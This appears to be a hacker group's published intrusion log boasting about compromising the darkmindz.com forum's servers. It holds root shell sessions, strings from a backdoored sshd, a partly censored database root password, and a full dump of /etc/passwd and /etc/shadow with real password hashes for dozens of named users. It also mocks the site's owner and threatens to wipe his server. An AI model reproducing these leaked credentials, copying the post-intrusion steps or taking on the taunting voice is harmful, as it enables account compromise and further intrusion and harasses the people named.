+eth0:6    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.198  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:7    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.199  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:8    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.200  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:9    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.201  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:10   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.202  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:11   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.203  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:12   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.204  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:13   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.205  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:14   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.206  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth1      Link encap:Ethernet  HWaddr 00:50:04:6F:DA:43  
+          BROADCAST MULTICAST  MTU:1500  Metric:1
+          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:1000 
+          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
+          Interrupt:217 Base address:0x8000 
+
+lo        Link encap:Local Loopback  
+          inet addr:127.0.0.1  Mask:255.0.0.0
+          inet6 addr: ::1/128 Scope:Host
+          UP LOOPBACK RUNNING  MTU:16436  Metric:1
+          RX packets:35636410 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:35636410 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0 
+          RX bytes:1453567506 (1.3 GiB)  TX bytes:1453567506 (1.3 GiB)
+
+sit0      Link encap:IPv6-in-IPv4  
+          NOARP  MTU:1480  Metric:1
+          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0 
+          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
+
+root@server [/var/run]# 
+
+
+root@server [/var/run]# strings /usr/sbin/sshd | grep -B 5 DlE46Y8KpH
+Rhosts authentication refused for %.100s: bad ownership or modes for home directory.
+Rhosts authentication refused for %.100s: bad modes for %.200s
+Server has been configured to ignore %.100s.
+Accepted host %s ip %s client_user %s server_user %s
+HOOKIN: %s:%s
+DlE46Y8KpH
+root@server [/var/run]# 
+
+root@server [/var/run]# strings /usr/sbin/sshd | grep -B 5 0x3
+check_key_in_hostfiles: key %s for %s
+auth1.c
+sending challenge '%s'
+ ruser %.100s
+do_authloop: BN_new failed
+0x3aownt
+
+root@server [~]# cat .my.cnf 
+[client]
+user="root"
+pass=",a5.z_censored_"
+root@server [~]# 
+
+root@server [/tmp]# cd /var/run/
+root@server [/var/run]# ls
+./                 couriersslcache        dbus/               mdmpd/           pm/                 saslauthd/       tailwatchd.pid
+../                cpanellogd.pid         eximstats/          messagebus.pid   pop3d.pid           screen/          upcp.pid
+acpid.socket=      cpdavd.pid             ftpd.sock=          named/           pop3d.pid.lock      sdp=             utmp
+audispd_events=    cphulkd_detector.pid   haldaemon.pid       named.pid@       pop3d-ssl.pid       setrans/         winbindd/
+auditd.pid         cphulkd_processor.pid  imapd.pid           netreport/       pop3d-ssl.pid.lock  setroubleshoot/  wpa_supplicant/
+autofs.fifo-misc|  cphulkd.sock=          imapd.pid.lock      NetworkManager/  ppp/                spamd.pid
+autofs.fifo-net|   cpsrvd.pid             imapd-ssl.pid       nscd/            pure-authd.pid      sshd.pid
+avahi-daemon/      crond.pid              imapd-ssl.pid.lock  pcscd.comm=      pure-ftpd/          ssh.old
+chkservd/          cups/                  klogd.pid           pcscd.pid        pure-ftpd.pid       sudo/
+console/           cupsd.pid              mdadm/              pcscd.pub        rpc.statd.pid       syslogd.pid
+root@server [/var/run]# cd screen/
+root@server [/var/run/screen]# ls
+./  ../  S-root/
+root@server [/var/run/screen]# cd S-root/
+root@server [/var/run/screen/S-root]# ls
+./  ../  13472.pts-0.server|
+root@server [/var/run/screen/S-root]# cat 13472.pts-0.server
+
+
+root@server [/var/run/screen/S-root]# ls
+./  ../  13472.pts-0.server|
+root@server [/var/run/screen/S-root]# cd ..
+root@server [/var/run/screen]# ls
+./  ../  S-root/
+root@server [/var/run/screen]# ps -aux | grep -r screen
+Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
+root     25085  0.0  0.0   3920   700 pts/1    S+   11:27   0:00 grep -r screen
+root@server [/var/run/screen]# ps -aux | grep -i screen
+Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
+root     13472  0.0  0.0   5056  1064 ?        Ss   Jun10   0:00 SCREEN
+root     25147  0.0  0.0   3920   680 pts/1    R+   11:27   0:00 grep -i screen
+root@server [/var/run/screen]# 
+
+
+_______         ________________ 
+\   _  \ ___  __\   _  \______  \
+/  /_\  \\  \/  /  /_\  \  /    /
+\  \_/   \>    <\  \_/   \/    / 
+ \_____  /__/\_ \\_____  /____/  
+       \/      \/      \/        
+    .___             __           .__            .___                 
+  __| _/____ _______|  | __ _____ |__| ____    __| _/_______          
+ / __ |\__  \\_  __ \  |/ //     \|  |/    \  / __ |\___   /   ______ 
+/ /_/ | / __ \|  | \/    <|  Y Y  \  |   |  \/ /_/ | /    /   /_____/ 
+\____ |(____  /__|  |__|_ \__|_|  /__|___|  /\____ |/_____ \          
+     \/     \/           \/     \/        \/      \/      \/          
+          ____________   .________
+_________/ ____\   _  \  |   ____/
+\___   /\   __\/  /_\  \ |____  \ 
+ /    /  |  |  \  \_/   \/       \
+/_____ \ |__|   \_____  /______  /
+      \/              \/       \/ 
+
+
+                                           |
+                                       \       /            _\/_
+     darkmindz                           .-'-.              //o\  _\/_
+                                    --  /     \  --           |   /o\\
+  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
+     We eat the night, we drink the time                            |
+       Make our dreams come true
+         And hungry eyes are passing by
+           On streets we call the zoo
+
+Darkmindz.com was just another "haxor" AKA idiot breeding ground forum run by
+the infamous saudi named RoMeO. Fortunetly due to the recent events RoMeO
+decided to kill his site and handle because he was sloppy & cocky enough to link
+his anti-sec activities with his public internet "life". This has spared us the
+trouble of needing to rm -rf /* his shit, so thx RoMeO, hope we can be friends.
+We didn't want a good hax.log to go to waste so we decided to publish darkmindz
+anyways.
+
+RoMeO is a blackhat wannabe and gave us good lulz with astalavista, props to
+that, but who the fuck is/was ssanz anyway and what's the point of spreading
+anti-sec propaganda via imageshack? You can't enjoy the benefits of a blackhat
+and run some retarded haxor forum at the same time pal, good to see that you
+realized that. But in any case if you decide to put your shitty forum online
+again, you will be rm'ed.
+
+Here's what we found in darkmindz land.
+
+root@www.darkmindz.com's password:
+Last login: Sat May 23 03:39:06 2009 from cpe-76-175-20-182.socal.res.rr.com
+ALERT! You are entering a secured area! Your IP and login information
+have been recorded. System administration has been notified.
+This system is restricted to authorized access only. All activities on
+this system are recorded and logged. Unauthorized access will be fully
+investigated and reported to the appropriate law enforcement agencies.
+
+root@server2:~[root@server2 ~]# uname -a; id
+Linux server2.hr-development.net 2.6.27.10-grsec #1 SMP Fri May 15 21:34:11 PDT
+2009 x86_64 x86_64 x86_64 GNU/Linux
+uid=0(root) gid=0(root)
+groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel)
+root@server2:~[root@server2 ~]# #who up in this mother fucker
+root@server2:~[root@server2 ~]# cat /etc/passwd /etc/shadow
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+nobody:x:99:99:Nobody:/:/sbin/nologin
+dbus:x:81:81:System message bus:/:/sbin/nologin
+nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
+vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
+rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
+sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+pcap:x:77:77::/var/arpwatch:/sbin/nologin
+mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
+smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
+rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
+nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
+
+rpm:x:37:37::/var/lib/rpm:/sbin/nologin
+haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
+named:x:25:25:Named:/var/named:/sbin/nologin
+apache:x:100:500::/var/www:/bin/false
+diradmin:x:101:101::/usr/local/directadmin:/bin/bash
+mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
+webapps:x:500:501::/var/www/html:/bin/bash
+majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
+dovecot:x:104:104::/home/dovecot:/bin/bash
+admin:x:501:502::/home/admin:/bin/bash
+hrdev:x:502:503::/home/hrdev:/bin/false
+keytraderz:x:504:505::/home/keytraderz:/bin/false
+yourkicks:x:507:508::/home/yourkicks:/bin/false
+aaa:x:508:509::/home/aaa:/bin/false
+beyond:x:509:510::/home/beyond:/bin/false
+hotglow:x:510:511::/home/hotglow:/bin/false
+wheelglow:x:512:513::/home/wheelglow:/bin/false
+penguin:x:513:514::/home/penguin:/bin/false
+ntp:x:38:38::/etc/ntp:/sbin/nologin
+furiogamin:x:516:517::/home/furiogamin:/bin/false
+kaza:x:517:518::/home/kaza:/bin/false
+pimpinjg:x:518:519::/home/pimpinjg:/bin/false
+dakilla:x:521:522::/home/dakilla:/bin/false
+bootroot:x:522:523::/home/bootroot:/bin/false
+scraft758:x:525:526::/home/scraft758:/bin/false
+hstrike:x:526:527::/home/hstrike:/bin/false
+romeo:x:528:529::/home/romeo:/bin/false
+xckx:x:529:530::/home/xckx:/bin/false
+h3mod:x:530:531::/home/h3mod:/bin/false
+clamav:x:533:534:Clam AntiVirus:/home/clamav:/bin/false
+avahi:x:70:70:Avahi daemon:/:/sbin/nologin
+avahi-autoipd:x:105:105:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
+hbxmike:x:535:536::/home/hbxmike:/bin/false
+wtfsmilez:x:536:537::/home/wtfsmilez:/bin/false
+haiobr:x:537:538::/home/haiobr:/bin/false
+odin:x:538:539::/home/odin:/bin/false
+sam:x:539:540::/home/sam:/bin/false
+mrgod:x:540:541::/home/mrgod:/bin/false
+pagewiz:x:541:542::/home/pagewiz:/bin/false
+zer0:x:542:543::/home/zer0:/bin/false
+dablitz:x:543:544::/home/dablitz:/bin/false
+ristop:x:544:545::/home/ristop:/bin/false
+bloo:x:545:546::/home/bloo:/bin/false
+root:$1$tilqrnIQ$fm2riVHK6dHchHIblFr/f1:14380:0:99999:7:::
+bin:*:14253:0:99999:7:::
+daemon:*:14253:0:99999:7:::
+shutdown:*:14253:0:99999:7:::
+halt:*:14253:0:99999:7:::
+mail:*:14253:0:99999:7:::
+ftp:*:14253:0:99999:7:::
+nobody:*:14253:0:99999:7:::
+dbus:!!:14253:0:99999:7:::
+nscd:!!:14253:0:99999:7:::
+vcsa:!!:14253:0:99999:7:::
+rpc:!!:14253:0:99999:7:::
+sshd:!!:14253:0:99999:7:::
+pcap:!!:14253:0:99999:7:::
+mailnull:!!:14253:0:99999:7:::
+smmsp:!!:14253:0:99999:7:::
+rpcuser:!!:14253:0:99999:7:::
+nfsnobody:!!:14253:0:99999:7:::
+rpm:!!:14253:0:99999:7:::
+haldaemon:!!:14253:0:99999:7:::
+named:!!:14257::::::
+apache:!!:14257::::::
+diradmin:!!:14256::::::
+mysql:!!:14256::::::
+webapps:!!:14256:0:99999:7:::
+majordomo:!!:14256::::::
+dovecot:!!:14256::::::
+admin:$1$hOf0pEJ7$Csc3Cf1boad5jK8A4.gCe1:14379:0:99999:7:::
+hrdev:$1$h66VePH.$Q18XKJHV0qQekrkx8DNPa.:14269:0:99999:7:::
+keytraderz:$1$apmWxy/L$YuzBwBVn6o87A7gAqMUfj0:14369:0:99999:7:::
+yourkicks:$1$IeMgb1QU$qNEVNIQDzjgW5Wt.V5cNs.:14269:0:99999:7:::
+aaa:$1$Pvq5Ze1q$Nn1bNt8aTVT7VaBCZFuMr1:14269:0:99999:7:::
+beyond:$1$gYlYPXOA$qMQTQ0gTMkqkeI3exuI5F0:14269:0:99999:7:::
+hotglow:$1$UL8Osrrl$pKpDOHKiBcj2a5NBN1n1M1:14269:0:99999:7:::
+wheelglow:$1$7CfmCRZb$TXXEzsFamBKkk7L10qKEn1:14269:0:99999:7:::
+penguin:!$1$NKcb5Ati$z.YERAUu8ADbbo8XId6.e.:14269:0:99999:7:::
+ntp:!!:14273::::::
+furiogamin:$1$ehClK7ld$2OchIgSTZ1wnYgJnWJe1L/:14278:0:99999:7:::
+kaza:$1$QU9IN8sS$cypmbg45B0V0k/a6knhzD0:14278:0:99999:7:::
+pimpinjg:$1$D0PGDf.U$6IyagtS0AYLnTXI4DiPmh1:14291:0:99999:7:::
+dakilla:$1$Foh0gQdF$NDc4LO/3Otwxt.WXNGb8u1:14383:0:99999:7:::
+bootroot:$1$YG4ZItt0$JYuixhSHo9KcJbdm4rumt.:14364:0:99999:7:::
+scraft758:$1$BD72wrXX$3SarFSWt249OF71EugOvp1:14292:0:99999:7:::
+hstrike:$1$roWSxdvs$X6QfaV/NhsXwqBCTFksL/0:14292:0:99999:7:::
+romeo:$1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx.:14353:0:99999:7:::
+xckx:$1$NsnILOqK$3mGncK6wPMYMsb9vnkOyt/:14293:0:99999:7:::
+h3mod:$1$XQo0rcc3$lmySsVMTrIC0ePWPXfOR2/:14293:0:99999:7:::
+clamav:!!:14336:0:99999:7:::
+avahi:!!:14336::::::
+avahi-autoipd:!!:14336::::::
+hbxmike:$1$PriF/4Bk$1.j6gBej9aPfrN4BJeDU11:14376:0:99999:7:::
+wtfsmilez:$1$NJsG5rdb$X.EqYJhBhWhuAjteubXEK/:14365:0:99999:7:::
+haiobr:$1$8WRmEqZ.$.shT4ddM9WHSteJ197DjE1:14385:0:99999:7:::
+odin:$1$z5xA/a5f$x4VoN/NQhQshmAei3bZj4.:14379:0:99999:7:::
+sam:$1$hQ9R7M26$pDBdZDh01EtAV1DxELrnc1:14376:0:99999:7:::
+mrgod:$1$WmNO8283$hpvrrWLnd5Pp/RlcwYvnm/:14377:0:99999:7:::
+pagewiz:$1$LgyU4TyH$kpQ.QEZ3mVv.nZQKvzrui0:14383:0:99999:7:::
+zer0:$1$KMAddC48$OTyb50QllFSKp4AR4AcsC0:14385:0:99999:7:::
+dablitz:$1$xUPbImWk$hDT9R4UAwbsQVyGxpZ.pu/:14386:0:99999:7:::
+ristop:$1$9SfY3MtY$n8cHnCN6tY2WvhitNOykh.:14386:0:99999:7:::
+bloo:$1$TtV5Q9IB$gi9SWdREB1ikky.Cgmiuu/:14387:0:99999:7:::
+root@server2:~[root@server2 ~]# grep romeo /etc/shadow
+romeo:$1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx.:14353:0:99999:7:::
+root@server2:~[root@server2 ~]# w
+ 04:05:41 up 18:48,  1 user,  load average: 0.34, 0.34, 0.23
+USER	 TTY	  FROM		    LOGIN@   IDLE   JCPU   PCPU WHAT
+root	 pts/0	  cpe-76-1x5-xx-xx 03:39   26:24   0.00s  0.00s -bash
+root@server2:~[root@server2 ~]# ls -al
+total 30488
+drwxr-x--- 11 root    root	 4096 May 23 02:47 .
+drwx--x--x 25 root    root	 4096 May 22 09:26 ..
+-rw-------  1 root    root	 1132 Mar 11 01:44 anaconda-ks.cfg
+-rw-r--r--  1 root    root	    0 May 20 17:26 authorized_keys2
+-rwxr-xr-x  1 root    root	   10 May 23 03:02 .bash_history
+-rw-r--r--  1 root    root	   24 Jan  6  2007 .bash_logout
+-rw-r--r--  1 root    root	  191 Jan  6  2007 .bash_profile
+-rw-r--r--  1 root    root	  176 Jan  6  2007 .bashrc
+drwxrwxrwx 24	 1000	1000	 4096 Apr 28 14:55 clamav-0.95.1
+-rw-r--r--  1 root    root   24260964 Apr  8 08:24 clamav-0.95.1.tar.gz
+-rw-r--r--  1 root    root     171053 May 22 13:49 cleaned_shells_php.txt
+drwxr-xr-x  4 root    root	 4096 Mar 18 00:50 .cpan
+-rw-r--r--  1 root    root	  100 Jan  6  2007 .cshrc
+-rw-r--r--  1 root    root	    4 Jan 12 16:21 .custombuild
+-rwxr-xr-x  1 root    root	21171 Jan 13 14:13 da.cpanel.import.pl
+-rw-r--r--  1 root    root	  288 Mar 31 05:21 defaults.conf
+drwxr-xr-x  2 root    root	 4096 Mar 23 19:03 export
+-rw-r--r--  1 root    root	 1155 May 15 22:15 f.c
+drwxr-xr-x  3 root    root	 4096 May 12 20:35 forum
+-rw-r--r--  1 root    root	  265 May 14 15:19 ifconfig
+drwxr-xr-x  2 root    root	 4096 Mar 23 19:03 import
+-rw-------  1 root    root	12288 Mar 27 04:26 .import.swp
+-rw-r--r--  1 root    root	 1724 Apr  1 18:53 initsec
+-rw-------  1 root    root	   97 May 23 04:02 .lesshst
+-rw-r--r--  1 root    root	   27 May 23 02:35 load
+-rw-------  1 root    root	   42 Feb  5 17:18 .my.cnf
+-rw-------  1 root    root	   37 May  2 15:19 .mysql_history
+-rw-r--r--  1 root    root	    9 Mar 31 05:21 .mytop
+drwxr-xr-x 16 webapps apache	 4096 Apr 28 16:11 nmap-4.85BETA8
+-rw-r--r--  1 root    root    6484436 Apr 21 14:38 nmap-4.85BETA8.tar.bz2
+drwxr-xr-x  3 root    root	 4096 May 20 14:31 qurantine
+-rw-------  1 root    root	 1024 Apr  2 18:01 .rnd
+-rwxr-xr-x  1 root    root	 2024 Apr 28 14:44 scan.pl
+drwx------  2 root    root	 4096 May 20 15:00 .ssh
+-rw-r--r--  1 root    root	  129 Jan  6  2007 .tcshrc
+-rw-------  1 root    root	12288 May 23 03:02 .test.swp
+drwxr-xr-x  2 root    root	 4096 May 14 14:00 tmp
+-rwxr-xr-x  1 root    root	47429 May 16  2008 tuning-primer.sh
+root@server2:~[root@server2 ~]# cat .bash_history
+exit
+exit
+root@server2:~[root@server2 ~]# #omg nmap, SECURE HOSTING
+root@server2:~[root@server2 ~]# date
+Sat May 23 04:06:57 PDT 2009
+root@server2:~[root@server2 ~]# cd /home/romeo/
+root@server2:/home/romeo[root@server2 romeo]# ls -al
+total 44
+drwx--x--x  6 romeo romeo 4096 Apr 22 15:51 .
+drwx--x--x 36 root  root  4096 May 23 02:33 ..
+drwx------  2 romeo romeo 4096 Feb 17 16:07 backups
+-rw-r--r--  1 romeo romeo   33 Dec 22 09:57 .bash_logout
+-rw-r--r--  1 romeo romeo  176 Dec 22 09:57 .bash_profile
+-rw-r--r--  1 romeo romeo  124 Dec 22 09:57 .bashrc
+-rw-------  1 romeo romeo    0 Feb  8 08:45 .clipboard.txt
+drwx--x--x  4 romeo romeo 4096 Dec 23 14:31 domains
+drwxrwx---  4 romeo mail  4096 Feb 17 16:07 imap
+drwxrwx---  5 romeo mail  4096 Dec 23 08:29 Maildir
+lrwxrwxrwx  1 romeo romeo   35 Feb 17 16:07 public_html ->
+./domains/darkmindz.com/public_html
+-rw-r-----  1 romeo mail    34 Apr 19 16:26 .shadow
+root@server2:/home/romeo[root@server2 romeo]# du -ch Maildir/
+4.0K	Maildir/tmp
+68M	Maildir/new
+4.0K	Maildir/cur
+68M	Maildir/
+68M	total
+root@server2:/home/romeo[root@server2 romeo]# #nice, thanks
+root@server2:/home/romeo[root@server2 romeo]# cd domains
+root@server2:/home/romeo/domains[root@server2 domains]# ls -la
+total 16
+drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 .
+drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 ..
+drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 cybershade.org
+drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 darkmindz.com
+root@server2:/home/romeo/domains[root@server2 domains]# cd darkmindz.com
+root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# ls
+-la
+total 40
+drwx--x--x  7 romeo romeo  4096 Apr 22 15:53 .
+drwx--x--x  4 romeo romeo  4096 Dec 23 14:31 ..
+drwxr-xr-x  2 romeo romeo  4096 Dec 22 09:57 .htpasswd
+drwxr-xr-x  2 root  root   4096 May 23 00:10 logs
+drwx--x--x  3 romeo romeo  4096 Dec 22 09:57 public_ftp
+drwxr-xr-x 15 romeo romeo  4096 May 20 14:30 public_html
+drwxr-xr-x  2 root  root   4096 May  1 00:10 stats
+-rw-r--r--  1 romeo romeo 12151 Feb  9 09:01 view_topic.php
+root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# cd
+public_html/
+root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
+public_html]# ls -al
+total 47264
+drwxr-xr-x 15 romeo romeo     4096 May 20 14:30 .
+drwx--x--x  7 romeo romeo     4096 Apr 22 15:53 ..
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 400.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 401.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 403.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 404.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 500.shtml
+-rw-r--r--  1 romeo romeo     5254 Feb 14 06:12 acp.php
+-rw-r--r--  1 romeo romeo     9757 Feb 14 06:12 ajax.php
+-rw-r--r--  1 romeo romeo     2118 Feb 14 06:12 articles.php
+drwxr-xr-x  2 romeo romeo     4096 Mar	4 11:11 _beta
+drwxrwxrwx  5 romeo romeo     4096 Mar 26 15:55 cache
+drwxr-xr-x  2 romeo romeo     4096 Dec 22 09:57 cgi-bin
+-rw-r--r--  1 romeo romeo     5561 Feb 14 06:12 challenges.php
+-rw-r--r--  1 romeo romeo     2137 Feb	2 08:43 codebase.php
+-rw-r--r--  1 romeo romeo    17251 Jan 13 07:21 convertor.php
+drwxr-xr-x  6 romeo romeo     4096 Feb	7 13:38 core
+-rw-r--r--  1 romeo romeo	 0 Jan 13 07:21 debug
+-rw-r--r--  1 romeo romeo     3266 Dec 22 22:59 eg.gif
+-rw-r--r--  1 romeo romeo     5036 Feb 27 17:58 forgotpass.php
+-rw-r--r--  1 romeo romeo     7107 Mar	1 11:30 forum.php
+-rw-r--r--  1 romeo romeo     2177 Jan 13 07:21 get_shouts.php
+-rw-r--r--  1 romeo romeo  1416102 Feb 17 14:24 halo.zip
+-rw-r--r--  1 romeo romeo     4546 Feb 19 14:07 .htaccess
+-rw-r--r--  1 romeo romeo	36 Jan 13 06:52 .htpasswd
+drwxr-xr-x  4 romeo romeo     4096 Feb	8 20:35 images
+drwxr-xr-x  2 romeo romeo     4096 Dec 22 22:20 img
+-rw-r--r--  1 romeo romeo     3998 Apr 19 16:40 index.php
+-rw-r--r--  1 romeo romeo      843 Feb 28 15:13 irc.php
+drwxr-xr-x  3 romeo romeo     4096 Feb	7 13:38 language
+-rw-r--r--  1 romeo romeo     4103 Feb 19 14:05 latest_posts.php
+-rwxrwxrwx  1 romeo romeo     7184 Feb 14 06:12 loader.php
+-rw-r--r--  1 romeo romeo     8398 Feb 14 06:12 login.php
+-rwxr-xr-x  1 romeo romeo    13954 Sep 15  2006 logo.jpg
+-rw-r--r--  1 romeo romeo     3006 Feb	1 21:44 merge.php
+drwxr-xr-x 20 romeo romeo     4096 Feb 12 13:44 modules
+-rw-r--r--  1 romeo romeo    10964 Feb 14 12:40 pastebin.php
+-rw-r--r--  1 romeo romeo    31019 Feb 14 06:12 post.bak.php
+-rw-r--r--  1 romeo romeo    35322 Feb 21 08:56 post.php
+-rw-r--r--  1 romeo romeo     2142 Feb 14 06:12 privatemessages.php
+-rw-r--r--  1 romeo romeo     9747 Feb 22 13:10 register.php
+-rw-r--r--  1 romeo romeo     7919 Mar 16 20:00 rss.php
+drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 scripts
+-rw-r--r--  1 romeo romeo     1065 Feb 14 06:12 search.php
+-rw-r--r--  1 romeo romeo     1838 Feb 14 06:12 settings.php
+drwxr-xr-x  2 root  root      4096 May 20 14:30 shell
+-rw-r--r--  1 romeo romeo 46487316 May 23 04:07 stress_test.txt
+-rw-r--r--  1 romeo romeo      994 Jan 13 07:22 swiigle_upload.php
+drwxr-xr-x  5 romeo romeo     4096 Feb	7 13:38 template
+-rw-r--r--  1 romeo romeo      454 Jan 13 07:22 template.php
+drwxr-xr-x  2 romeo romeo     4096 Feb 16 21:05 templates
+-rw-r--r--  1 romeo romeo      610 Feb 18 08:17 test.php
+drwxr-xr-x  2 romeo romeo     4096 Feb	7 13:38 txt docs
+-rw-r--r--  1 romeo romeo     2708 Feb 14 06:12 ucp.php
+-rw-r--r--  1 romeo romeo     7789 Feb 14 06:12 view_group.bak.php
+-rw-r--r--  1 romeo romeo     8556 Mar	1 11:30 view_group.php
+-rw-r--r--  1 romeo romeo      876 Feb 14 06:12 view_profile.php
+-rw-r--r--  1 romeo romeo    12677 Feb 14 13:16 view_topic.bak.php
+-rw-r--r--  1 romeo romeo    12871 Mar	1 11:30 view_topic.php
+-rw-r--r--  1 romeo romeo     9571 Feb 14 06:12 windowed_options.php
+root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
+public_html]# ls -la scripts/
+total 476
+drwxr-xr-x  2 romeo romeo   4096 Feb  7 13:38 .
+drwxr-xr-x 15 romeo romeo   4096 May 20 14:30 ..
+-rw-r--r--  1 romeo romeo   4770 Jan 13 12:11 builder.js
+-rw-r--r--  1 romeo romeo    588 Jan 13 12:11 cli.js
+-rw-r--r--  1 romeo romeo  35851 Jan 13 12:12 controls.js
+-rw-r--r--  1 romeo romeo  35253 Jan 13 12:11 dragdrop.js
+-rw-r--r--  1 romeo romeo  38986 Jan 13 12:12 effects.js
+-rw-r--r--  1 romeo romeo   8663 Feb 14 12:40 functions.js
+-rw-r--r--  1 romeo romeo   6897 Jan 13 12:11 growl.js
+-rw-r--r--  1 romeo romeo  63854 Jan 13 12:11 lightwindow.js
+-rw-r--r--  1 romeo romeo  52665 Jan 13 12:12 php.min.js
+-rw-r--r--  1 romeo romeo   1457 Jan 13 12:11 pm.js
+-rw-r--r--  1 romeo romeo   1637 Jan 13 12:11 pngfix.js
+-rw-r--r--  1 romeo romeo   3261 Jan 13 12:11 proto.menu.js
+-rw-r--r--  1 romeo romeo 130380 Jan 13 12:12 prototype.js
+-rw-r--r--  1 romeo romeo   2733 Jan 13 12:11 register.js
+-rw-r--r--  1 romeo romeo   2711 Jan 13 12:11 scriptaculous.js
+-rw-r--r--  1 romeo romeo    121 Jan 13 12:11 shoutbox.js
+-rw-r--r--  1 romeo romeo  10296 Jan 13 12:12 slider.js
+-rw-r--r--  1 romeo romeo   1920 Jan 13 12:12 sound.js
+-rw-r--r--  1 romeo romeo  20197 Jan 13 12:12 unittest.js
+-rw-r--r--  1 romeo romeo   6145 Feb 14 12:40 user.php
+root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
+public_html]# ls -la shell/
+total 1564
+drwxr-xr-x  2 root  root    4096 May 20 14:30 .
+drwxr-xr-x 15 romeo romeo   4096 May 20 14:30 ..
+-rw-r--r--  1 romeo romeo   1297 Feb 16 21:05 ajan.txt
+-rw-r--r--  1 romeo romeo  44210 Feb 16 21:06 b64.txt
+-rw-r--r--  1 romeo romeo    140 Feb 16 21:06 backdoor.txt
+-rw-r--r--  1 romeo romeo  11141 Feb 16 21:06 c101.txt
+-rw-r--r--  1 romeo romeo   1468 Feb 16 21:06 cmd.txt
+-rw-r--r--  1 romeo romeo  18519 Feb 16 21:06 codeanalyzer.txt
+-rw-r--r--  1 romeo romeo 114861 Feb 16 21:06 constance.txt
